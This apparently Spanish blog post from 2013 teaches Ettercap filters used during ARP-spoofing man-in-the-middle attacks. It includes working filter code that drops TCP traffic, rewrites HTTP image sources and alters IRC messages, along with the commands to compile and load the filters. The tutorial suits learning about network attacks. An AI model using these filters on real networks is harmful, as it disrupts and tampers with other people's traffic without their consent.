28 mar 2013

Jugando con Ettercap (Parte III de III)

Para terminar esta serie de artículos sobre Ettercap vamos a tratar una de las funcionalidades que más me gusta por su abanico de posibilidades donde una vez más y como diría Pablo “El límite es tu imaginación”.

Los filtros de ettercap son uno de sus fuertes como herramienta de red, con ellos podemos entre otras cosas modificar los paquetes que recibirá el ordenador spoofeado. El funcionamiento es muy sencillo y su sintaxis es parecida lenguajes de programación tales como C o Python.

Un ejemplo sencillo seria capar todos los paquetes TCP. Para ello bastaría con usar el siguiente filtro:

if (ip.proto == TCP )

{

      drop();

      kill();

 }

Si quisiéramos cortar la conexión contra una IP o un puerto concreto bastaría con cambiar la condición por “ip.src == ‘134.0.11.133’ || ip.dst == ‘134.0.11.133’” o “tcp.src == 110 || tcp.dst == 110” respectivamente.

Otra opción muy interesante que nos dan estos filtros es la de modificar la sintaxis HTML que recibe el equipo. De esta manera podremos, por ejemplo, cambiar las imágenes que el usuario debería recibir por el logo de Flu. Para ello deberemos modificar el atributo src de la etiqueta IMG.

if (ip.proto == TCP && tcp.dst == 80) {

      if (search(DATA.data, "Accept-Encoding")) {

           replace("Accept-Encoding", "Accept-Rubbish!");

      }

}

 if (ip.proto == TCP && tcp.src == 80) {

      replace("img src=", "img src=\"http://www.flu-project.com/logo.png\" ");

}

Con este otro filtro modificaríamos palabras o cadenas de palabras que se reciben por IRC

if (ip.proto == TCP) {

    if (tcp.src == 6667 || tcp.dst == 6667) {

        if (search(DATA.data, "")) {

            replace(“Madrid", “Barça");

            replace("Sebastian Vettel", "Fernando Alonso ");

        }

    }

}

Esto solo son algunos ejemplos, pero el potencial real de la herramienta radica en la creatividad del usuario.

Quizás os estáis preguntando, ¿ahora que tengo el filtro que hago con él? Para ponerlo a funcionar debemos guardarlo en un archivo de texto y compilarlo con el siguiente comando:

etterfilter filtro.txt –o f_compilado.ef

Ahora solo nos queda ejecutarlo. Para ello añadiremos la opción “-F f_compilado.ef” en ettercap si vamos a realizar el MiTM desde la consola o bien, añadirlo desde la pestaña Filters en Ettercap-NG si realizaremos el ataque desde la interfaz gráfica.

1 comentario: